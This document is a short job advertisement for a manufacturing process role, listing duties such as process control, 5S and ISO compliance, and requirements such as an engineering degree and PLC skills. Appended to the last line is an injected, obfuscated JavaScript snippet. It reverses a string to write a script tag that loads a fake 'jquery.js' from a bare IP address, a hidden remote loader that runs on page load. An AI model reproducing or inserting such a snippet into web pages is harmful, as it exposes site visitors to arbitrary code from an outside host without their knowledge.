Industry : Manufacturing
– In charge of process control and process operations to improve productivity and lower production costs.
– Plan and control manpower /overtime / raw materials and parts usage in production line.
– Emphasize the implementation of Health & Safety, 5S and ISO compliance at production.
– Analyze problem on line quality issues and organize for corrective and preventive action.
– Plan preventive maintenance with maintenance team.
– Degree or Diploma in Electrical/Mechanical/Chemical/Material Engineering.
– At least 3 years’ experience, but fresh graduates also encouraged to apply.
– Preferably possess electrical or PLC skill.
– Good problem solving skill and good team player.
– Strong command in Excel & Power Point presentation.
– Good command of English. document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))